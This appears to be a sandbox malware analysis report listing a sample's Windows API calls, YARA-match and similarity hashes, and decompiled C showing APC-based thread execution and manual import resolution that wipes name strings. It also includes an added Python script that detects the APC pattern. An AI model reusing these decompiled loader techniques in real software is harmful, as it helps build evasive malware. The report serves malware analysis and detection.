• NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: SectionView
• String ID:
• API String ID: 1323581903-0
• Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
• Instruction ID: d0effbb520f69120ab9023fe09b6315617a27c4394e14a4669dfcda6dbeb9666
• Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
• Instruction Fuzzy Hash: 90F012B690020CFFDB119FA5CC89C9FBBBDEB44349B10882AF542D1050D6319E189B61
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0046E240), ref: 00458671
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
• Opcode ID: 23144df6e49275368eca9fb7fc252a998d61e70e16fdb132f237e7e063f70224
• Instruction ID: b4970ce301b587462f0bf4e48fc2204ad447b3b6c66bf761e597e857a7751921
• Opcode Fuzzy Hash: 23144df6e49275368eca9fb7fc252a998d61e70e16fdb132f237e7e063f70224
• Instruction Fuzzy Hash: 74F0BE313001299FCB20DF19CC44D9BBBA8EB04741B014429EE00EB2A2EB30EC09CBE4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AB70
• RtlDeleteCriticalSection.NTDLL(0046E220), ref: 0044ABA3
• RtlDeleteCriticalSection.NTDLL(0046E240), ref: 0044ABAA
• CloseHandle.KERNEL32(?,?,00445505), ref: 0044ABD9
• ReleaseMutex.KERNEL32(00000324,00000000,?,?,?,00445505), ref: 0044ABEA
• FindCloseChangeNotification.KERNELBASE(?,?,00445505), ref: 0044ABF6
• ResetEvent.KERNEL32(00000000,00000000,?,?,?,00445505), ref: 0044AC02
• CloseHandle.KERNEL32(?,?,00445505), ref: 0044AC0E
• SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AC14
• SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044AC28
• HeapFree.KERNEL32(00000000,00000000,?,?,00445505), ref: 0044AC4B
• RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0044AC84
• SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044ACA0
• FindCloseChangeNotification.KERNELBASE(03BD8418,?,?,00445505), ref: 0044ACC7
• LocalFree.KERNEL32(?,?,00445505), ref: 0044ACD7
  • Part of subcall function 0046386B: GetVersion.KERNEL32(?,00000000,74B5F720,?,0044AB61,00000000,?,?,?,00445505), ref: 0046388F
  • Part of subcall function 0046386B: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,0044AB61,00000000,?,?,?,00445505), ref: 004638A3
  • Part of subcall function 0046386B: GetProcAddress.KERNEL32(00000000), ref: 004638AA
  • Part of subcall function 00462D5E: RtlEnterCriticalSection.NTDLL(0046E240), ref: 00462D68
  • Part of subcall function 00462D5E: RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00462DA4
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseCriticalSectionSleep$Handle$ChangeDeleteFindFreeNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
• String ID:
• API String ID: 2858272568-0
• Opcode ID: ddfa5bcb58e78052fc11ac66baef7f0111c6b288f1f2650a49da3561a88d3b53
• Instruction ID: 2a0f4cbb0f4d85028b30795c55c9485400d68c0abdddfa84e4036920fe599c92
• Opcode Fuzzy Hash: ddfa5bcb58e78052fc11ac66baef7f0111c6b288f1f2650a49da3561a88d3b53
• Instruction Fuzzy Hash: D441B635680221DFEB20AF66EDC5A5637E6EB01300714043AF600D7271EBF99C558B6F
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                         C-Code - Quality: 88%
                                                                                                                                         			// Decompiler output. The trailing "// 0x..." on a statement is its address in the dump;
                                                                                                                                         			// statements the decompiler synthesised (gotos, folded returns; 0x00000000 in the listing)
                                                                                                                                         			// have none. "// executed" marks calls that were observed during the dynamic run.
                                                                                                                                         			E73751D97(void* __ecx, void* __edx, char _a4) {
                                                                                                                                         				long _v8;
                                                                                                                                         				void* _v32;
                                                                                                                                         				void* __edi;
                                                                                                                                         				intOrPtr _t11;     // used below but missing from the decompiler's declaration list
                                                                                                                                         				long _t17;
                                                                                                                                         				long _t19;
                                                                                                                                         				long _t21;
                                                                                                                                         				long _t22;
                                                                                                                                         				void* _t23;
                                                                                                                                         				long _t26;
                                                                                                                                         				long _t27;
                                                                                                                                         				void* _t36;
                                                                                                                                         				intOrPtr _t38;
                                                                                                                                         				long _t43;
                                                                                                                                         				intOrPtr _t44;
                                                                                                                                         				void* _t45;
                                                                                                                                         				void* _t50;
                                                                                                                                         				signed int _t53;
                                                                                                                                         				void* _t55;
                                                                                                                                         				intOrPtr* _t56;
                                                                                                                                         
                                                                                                                                         				_t45 = __ecx;                                                   // 0x73751d97
                                                                                                                                         				_t17 = E73751371();   // CreateEventA / GetVersion / OpenProcess (see APIs)   // 0x73751d9e
                                                                                                                                         				_v8 = _t17;                                                     // 0x73751da7
                                                                                                                                         				if(_t17 != 0) {                                                 // 0x73751daa
                                                                                                                                         					return _t17;                                                // 0x73751edb
                                                                                                                                         				}                                                               // 0x73751edb
                                                                                                                                         				// Retry loop: E7375123E (VirtualAlloc + memcpy + VirtualFree, see APIs) is repeated
                                                                                                                                         				// while it returns 0xc. SwitchToThread() yields 0 or 1, so each pass sleeps 0x40 or 0x44 ms.
                                                                                                                                         				do {                                                            // 0x73751db1
                                                                                                                                         					_t53 = SwitchToThread() + 8;                                // 0x73751db9
                                                                                                                                         					_t19 = E7375123E(0, _t53); // executed                      // 0x73751dbd
                                                                                                                                         					_v8 = _t19;                                                 // 0x73751dc2
                                                                                                                                         					Sleep(0x20 + _t53 * 4); // executed                         // 0x73751dcd
                                                                                                                                         					_t21 = _v8;                                                 // 0x73751dd3
                                                                                                                                         				} while (_t21 == 0xc);                                          // 0x73751dd6
                                                                                                                                         				if(_t21 != 0) {                                                 // 0x73751ddd
                                                                                                                                         					L23:                                                        // 0x73751ed8
                                                                                                                                         					return _t21;
                                                                                                                                         				}                                                               // 0x73751ed8
                                                                                                                                         				_t22 = E73751FDB(_t45); // executed                             // 0x73751de3
                                                                                                                                         				_v8 = _t22;                                                     // 0x73751dea
                                                                                                                                         				if(_t22 != 0) {                                                 // 0x73751ded
                                                                                                                                         					L21:                                                        // 0x73751eca
                                                                                                                                         					// A stored -1 means "report the Win32 last error" rather than a status of its own.
                                                                                                                                         					_t21 = _v8;                                                 // 0x73751eca
                                                                                                                                         					if(_t21 == 0xffffffff) {                                    // 0x73751ed0
                                                                                                                                         						_t21 = GetLastError();                                  // 0x73751ed2
                                                                                                                                         					}                                                           // 0x73751ed2
                                                                                                                                         					goto L23;
                                                                                                                                         				}                                                               // 0x73751ed0
                                                                                                                                         				if(_a4 != 0) {                                                  // 0x73751df7
                                                                                                                                         					L12:                                                        // 0x73751e48
                                                                                                                                         					// Start a thread whose entry point is kernel32!SleepEx, with the value at 0x7375414c
                                                                                                                                         					// as its only supplied argument (the timeout). The thread therefore does nothing itself;
                                                                                                                                         					// the user APC queued below runs inside it once it sits in an alertable wait.
                                                                                                                                         					_t23 = CreateThread(0, 0, __imp__SleepEx,  *0x7375414c, 0, 0); // executed   // 0x73751e5a
                                                                                                                                         					_t55 = _t23;                                                // 0x73751e60
                                                                                                                                         					if(_t55 == 0) {                                             // 0x73751e64
                                                                                                                                         						L19:                                                    // 0x73751ec0
                                                                                                                                         						_v8 = GetLastError();                                   // 0x73751ec6
                                                                                                                                         						L20:                                                    // 0x73751ec9
                                                                                                                                         						goto L21;
                                                                                                                                         					}                                                           // 0x73751ec9
                                                                                                                                         					// Queue E73752058 as a user-mode APC on the new thread, passing &_v32 as its argument.
                                                                                                                                         					_t26 = QueueUserAPC(E73752058, _t55,  &_v32); // executed   // 0x73751e70
                                                                                                                                         					if(_t26 == 0) {                                             // 0x73751e7e
                                                                                                                                         						// Queueing failed: kill the idle thread, keeping the error code across CloseHandle.
                                                                                                                                         						_t43 = GetLastError();                                  // 0x73751e86
                                                                                                                                         						TerminateThread(_t55, _t43);                            // 0x73751e8a
                                                                                                                                         						CloseHandle(_t55);                                      // 0x73751e91
                                                                                                                                         						_t55 = 0;                                               // 0x73751e94
                                                                                                                                         						SetLastError(_t43);                                     // 0x73751e96
                                                                                                                                         					}                                                           // 0x73751e96
                                                                                                                                         					if(_t55 == 0) {                                             // 0x73751e9e
                                                                                                                                         						goto L19;
                                                                                                                                         					} else {                                                    // 0x73751ea0
                                                                                                                                         						// Block until the thread exits; its exit code becomes this function's result.
                                                                                                                                         						_t27 = WaitForSingleObject(_t55, 0xffffffff);           // 0x73751ea3
                                                                                                                                         						_v8 = _t27;                                             // 0x73751eab
                                                                                                                                         						if(_t27 == 0) {                                         // 0x73751eae
                                                                                                                                         							GetExitCodeThread(_t55,  &_v8); // executed         // 0x73751eb5
                                                                                                                                         						}                                                       // 0x73751eb5
                                                                                                                                         						CloseHandle(_t55);                                      // 0x73751ebc
                                                                                                                                         						goto L20;
                                                                                                                                         					}                                                           // 0x73751ebc
                                                                                                                                         				}                                                               // 0x73751e9e
                                                                                                                                         				if(E73751958(_t45,  &_a4) != 0) {                               // 0x73751e04
                                                                                                                                         					 *0x73754138 = 0;                                           // 0x73751e42
                                                                                                                                         					goto L12;
                                                                                                                                         				}                                                               // 0x73751e42
                                                                                                                                         				// Canonicalise the path in _a4 with the two-call idiom: query the required length
                                                                                                                                         				// (cchBuffer == 0), allocate, then fill. The result is stored in the global at 0x73754138.
                                                                                                                                         				_t44 = _a4;                                                     // 0x73751e06
                                                                                                                                         				_t56 = __imp__GetLongPathNameW;                                 // 0x73751e09
                                                                                                                                         				_t36 =  *_t56(_t44, 0, 0); // executed                          // 0x73751e12
                                                                                                                                         				_t50 = _t36;                                                    // 0x73751e14
                                                                                                                                         				if(_t50 == 0) {                                                 // 0x73751e18
                                                                                                                                         					L10:                                                        // 0x73751e3a
                                                                                                                                         					 *0x73754138 = _t44;   // fall back to the original string   // 0x73751e3a
                                                                                                                                         					goto L12;
                                                                                                                                         				}                                                               // 0x73751e3a
                                                                                                                                         				_t11 = _t50 + 2;                                                // 0x73751e1a
                                                                                                                                         				_t38 = E737518C2(_t50 + _t11);   // presumably an allocator: 2*_t50 + 2 bytes, i.e. _t50 WCHARs plus a terminator   // 0x73751e1f
                                                                                                                                         				 *0x73754138 = _t38;                                            // 0x73751e26
                                                                                                                                         				if(_t38 == 0) {                                                 // 0x73751e2b
                                                                                                                                         					goto L10;
                                                                                                                                         				}
                                                                                                                                         				 *_t56(_t44, _t38, _t50); // executed                            // 0x73751e30
                                                                                                                                         				E737514B6(_t44);   // presumably releases the original string   // 0x73751e33
                                                                                                                                         				goto L12;
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 73751371: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,73751DA3), ref: 73751380
                                                                                                                                          • Part of subcall function 73751371: GetVersion.KERNEL32(?,73751DA3), ref: 7375138F
                                                                                                                                          • Part of subcall function 73751371: GetCurrentProcessId.KERNEL32(?,73751DA3), ref: 7375139E
                                                                                                                                          • Part of subcall function 73751371: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,73751DA3), ref: 737513B7
                                                                                                                                        • SwitchToThread.KERNEL32 ref: 73751DB1
                                                                                                                                          • Part of subcall function 7375123E: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,?,?,-00000008,-00000008), ref: 73751294
                                                                                                                                          • Part of subcall function 7375123E: memcpy.NTDLL(?,?,-00000008,?,?,-00000008,-00000008,?,?,?,?,?,?,?,?,73751DC2), ref: 73751326
                                                                                                                                          • Part of subcall function 7375123E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,-00000008,-00000008), ref: 73751341
                                                                                                                                        • Sleep.KERNELBASE(00000000,-00000008), ref: 73751DCD
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 73751E12
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 73751E30
                                                                                                                                        • CreateThread.KERNEL32 ref: 73751E5A
                                                                                                                                        • QueueUserAPC.KERNELBASE(73752058,00000000,?), ref: 73751E70
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751E80
                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 73751E8A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 73751E91
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 73751E96
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 73751EA3
                                                                                                                                        • GetExitCodeThread.KERNELBASE(00000000,?), ref: 73751EB5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 73751EBC
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751EC0
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751ED2
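                                                                                                                                         The APIs list above is what an analyst actually has when triaging hundreds of such functions, so the following added example (not part of the Joe Sandbox report or of the sample) parses that list in the report's own line format and flags the CreateThread, QueueUserAPC, WaitForSingleObject sequence that E73751D97 uses to run E73752058 in a fresh thread. The sample block is a constructed copy of the lines above; the image base 0x73750000 is taken from this function's Memory Dump Source entry, and the image size 0x8000 is an assumption.

```python
"""Parse the per-function "APIs" listing from a Joe Sandbox report and flag
the thread-start-via-APC pattern seen in E73751D97:
CreateThread -> QueueUserAPC(<routine inside the analysed image>) -> wait."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the "APIs" block of one function, in the report's own
# line format (bullet, optional subcall prefix, API.module(args), ref: address).
SAMPLE_API_BLOCK = """\
• Part of subcall function 7375123E: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,?,?,-00000008,-00000008), ref: 73751294
• Part of subcall function 7375123E: memcpy.NTDLL(?,?,-00000008,?,?,-00000008,-00000008,?,?,?,?,?,?,?,?,73751DC2), ref: 73751326
• Part of subcall function 7375123E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,-00000008,-00000008), ref: 73751341
• Sleep.KERNELBASE(00000000,-00000008), ref: 73751DCD
• CreateThread.KERNEL32 ref: 73751E5A
• QueueUserAPC.KERNELBASE(73752058,00000000,?), ref: 73751E70
• GetLastError.KERNEL32 ref: 73751E80
• TerminateThread.KERNEL32(00000000,00000000), ref: 73751E8A
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 73751EA3
• GetExitCodeThread.KERNELBASE(00000000,?), ref: 73751EB5
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"          # API name and exporting module
    r"(?:\((?P<args>[^)]*)\))?"            # optional argument list
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report prints '?'
    ref: int                    # address of the call site
    subcall: Optional[int]      # function the call was reported from, if not direct


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok == "?":
        return None
    # The report prints small negative values as '-00000008'; keep the sign.
    return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)


def parse_api_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def find_apc_thread_start(calls, image_base, image_size):
    """Return the call-site refs of a CreateThread -> QueueUserAPC -> WaitForSingleObject
    sequence whose APC routine lies inside the analysed image, or None.
    Only direct calls (not subcall lines) are considered, in address order."""
    direct = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    create = apc = None
    for c in direct:
        if c.api == "CreateThread":
            create = c
        elif c.api == "QueueUserAPC" and create is not None and c.args:
            routine = c.args[0]
            if routine is not None and image_base <= routine < image_base + image_size:
                apc = c
        elif c.api == "WaitForSingleObject" and apc is not None:
            return {"CreateThread": create.ref, "QueueUserAPC": apc.ref,
                    "apc_routine": apc.args[0], "WaitForSingleObject": c.ref}
    return None


if __name__ == "__main__":
    hit = find_apc_thread_start(parse_api_block(SAMPLE_API_BLOCK), 0x73750000, 0x8000)
    print({k: hex(v) for k, v in hit.items()} if hit else "no APC thread-start pattern")
```

                                                                                                                                         The check keys on the APC routine address falling inside the analysed image rather than on the start routine (which the report's CreateThread line does not show), so a variant that parks the thread on a different alertable wait instead of SleepEx still matches; subcall lines are excluded so that the VirtualAlloc/memcpy/VirtualFree entries reported from E7375123E do not shift the ordering.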
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3896949738-0
                                                                                                                                        • Opcode ID: 101335ffcfc5dec7b8ecdfdd8d870313ca19829c934a7337608ff2b8c5b2a742
                                                                                                                                        • Instruction ID: 8c49300953b11a0a48963d6ea5633f47a3ab8316ff04a8998d2a520fd9421d89
                                                                                                                                        • Opcode Fuzzy Hash: 101335ffcfc5dec7b8ecdfdd8d870313ca19829c934a7337608ff2b8c5b2a742
                                                                                                                                        • Instruction Fuzzy Hash: 3A319573900319ABDB1AEBB68C48F5F7ABEAF852537240115F84AD3150E7398901DBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,?,00444163,?), ref: 004410BB
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00444163,?), ref: 004410CD
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 004410DC
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00444163,?), ref: 004410ED
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000400,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?), ref: 00441123
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 0044113E
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?,?), ref: 00441153
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000040,?,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?,?), ref: 00441180
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 0044119A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 004411A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3676034644-0
                                                                                                                                        • Opcode ID: 24b047f0f567902ae926f80ae15a8a81b6c2fc1a0c972a5fa3fa0a631be3605c
                                                                                                                                        • Instruction ID: 90d9e04f25dfc25ac7a0e80a618f8bea9885c15da1f953a63ab8278039af5b26
                                                                                                                                        • Opcode Fuzzy Hash: 24b047f0f567902ae926f80ae15a8a81b6c2fc1a0c972a5fa3fa0a631be3605c
                                                                                                                                        • Instruction Fuzzy Hash: EA4157715007099FEB319F65CC44EABB7F5FB08310F00861AE655A66B0E779E845CF19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00441268: VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044128D
                                                                                                                                          • Part of subcall function 00441268: GetLastError.KERNEL32 ref: 00441295
                                                                                                                                          • Part of subcall function 00441268: VirtualQuery.KERNEL32(?,?,0000001C), ref: 004412AC
                                                                                                                                          • Part of subcall function 00441268: VirtualProtect.KERNEL32(?,?,-4CD94B84,?), ref: 004412D1
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001,?,?,?,00000000,?), ref: 00447B06
                                                                                                                                          • Part of subcall function 00445528: lstrlen.KERNEL32(?,?,?,?,004440F5), ref: 00445560
                                                                                                                                          • Part of subcall function 00445528: lstrcpy.KERNEL32(00000000,?), ref: 00445577
                                                                                                                                          • Part of subcall function 00445528: StrChrA.SHLWAPI(00000000,0000002E,?,?,004440F5), ref: 00445580
                                                                                                                                          • Part of subcall function 00445528: GetModuleHandleA.KERNEL32(00000000,?,?,004440F5), ref: 0044559E
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002), ref: 00447A84
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001), ref: 00447A9F
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00447AC3
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00447AE1
                                                                                                                                          • Part of subcall function 00441268: SetLastError.KERNEL32(?), ref: 004412DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                                                                                                        • String ID: $8F
                                                                                                                                        • API String ID: 899430048-3514273430
                                                                                                                                        • Opcode ID: d8a83db41a071bfdf86181a66141dd84a7444d561612baddb76918a478949ec6
                                                                                                                                        • Instruction ID: e69184858933d212faf20ed9f8564a2ae76be6da52a7e9ddaf7ec6699ac16e1b
                                                                                                                                        • Opcode Fuzzy Hash: d8a83db41a071bfdf86181a66141dd84a7444d561612baddb76918a478949ec6
                                                                                                                                        • Instruction Fuzzy Hash: 6741B275900605EFEB10DF65C848A9EBBF4FF04314F10821AF914AB250E778EA51CFA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?,?,?,?,00000000), ref: 00459C1F
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,00000000,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?,?), ref: 00459CAA
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00459CD2
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00459CF0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 3666628472-3652835401
                                                                                                                                        • Opcode ID: 386712c481c3545a3610468fb3213ed342556be166252ac2590ffe56cf8fd597
                                                                                                                                        • Instruction ID: fdc030bc546f047fbbc0d08b847eb292960ef5b6477c6f4ec08aff77f9197d6d
                                                                                                                                        • Opcode Fuzzy Hash: 386712c481c3545a3610468fb3213ed342556be166252ac2590ffe56cf8fd597
                                                                                                                                        • Instruction Fuzzy Hash: F5416270900605EFDB11DF66C88499EBBF4FF48301B10492BE815E7251D778AE45CFA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E73751BCD(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				signed short _v12;
                                                                                                                                        				struct HINSTANCE__* _v16;
                                                                                                                                        				intOrPtr _v20;
                                                                                                                                        				_Unknown_base(*)()* _v24;
                                                                                                                                        				intOrPtr _t34;
                                                                                                                                        				intOrPtr _t36;
                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                        				intOrPtr _t40;
                                                                                                                                        				CHAR* _t44;
                                                                                                                                        				_Unknown_base(*)()* _t45;
                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                        				intOrPtr _t53;
                                                                                                                                        				signed short _t54;
                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                        				signed short _t59;
                                                                                                                                        				CHAR* _t60;
                                                                                                                                        				CHAR* _t62;
                                                                                                                                        				signed short* _t64;
                                                                                                                                        				void* _t65;
                                                                                                                                        				signed short _t72;
                                                                                                                                        
                                                                                                                                        				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                        				_t52 = _a4;
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					L28:
                                                                                                                                        					return _v8;
                                                                                                                                        				}
                                                                                                                                        				_t57 = _t34 + _t52;
                                                                                                                                        				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                        				_a4 = _t57;
                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                        					L27:
                                                                                                                                        					goto L28;
                                                                                                                                        				}
                                                                                                                                        				while(1) {
                                                                                                                                        					_t62 = _t36 + _t52;
                                                                                                                                        					_t37 = LoadLibraryA(_t62); // executed
                                                                                                                                        					_v16 = _t37;
                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                        					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                        					_t53 =  *_t57;
                                                                                                                                        					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                        					_t65 = _t65 + 0xc;
                                                                                                                                        					if(_t53 != 0) {
                                                                                                                                        						L6:
                                                                                                                                        						_t64 = _t53 + _t52;
                                                                                                                                        						_t54 =  *_t64;
                                                                                                                                        						if(_t54 == 0) {
                                                                                                                                        							L23:
                                                                                                                                        							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                        							_t57 = _t57 + 0x14;
                                                                                                                                        							_a4 = _t57;
                                                                                                                                        							if(_t36 != 0) {
                                                                                                                                        								continue;
                                                                                                                                        							}
                                                                                                                                        							L26:
                                                                                                                                        							goto L27;
                                                                                                                                        						}
                                                                                                                                        						_v20 = _t40 - _t64 + _t52;
                                                                                                                                        						_t72 = _t54;
                                                                                                                                        						L8:
                                                                                                                                        						if(_t72 < 0) {
                                                                                                                                        							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                        								_t59 = 0;
                                                                                                                                        								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                        							} else {
                                                                                                                                        								_t59 = _t54;
                                                                                                                                        							}
                                                                                                                                        						} else {
                                                                                                                                        							_t59 = _t54 + _t52;
                                                                                                                                        						}
                                                                                                                                        						_t20 = _t59 + 2; // 0x2
                                                                                                                                        						_t44 = _t20;
                                                                                                                                        						if(_t59 == 0) {
                                                                                                                                        							_t44 = _v12 & 0x0000ffff;
                                                                                                                                        						}
						_t45 = GetProcAddress(_v16, _t44); // resolve the next export by name
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21; // lookup failed: status 0x7f
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60)); // zero the string at _t59+2 once it has been used
							_t65 = _t65 + 0xc;
						}
						*(_v20 + _t64) = _v24; // store the resolved address in the output table
						_t64 = &(_t64[2]); // advance to the next table entry
						_t54 = *_t64;
						if(_t54 != 0) {
							goto L8; // more entries to resolve
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

APIs
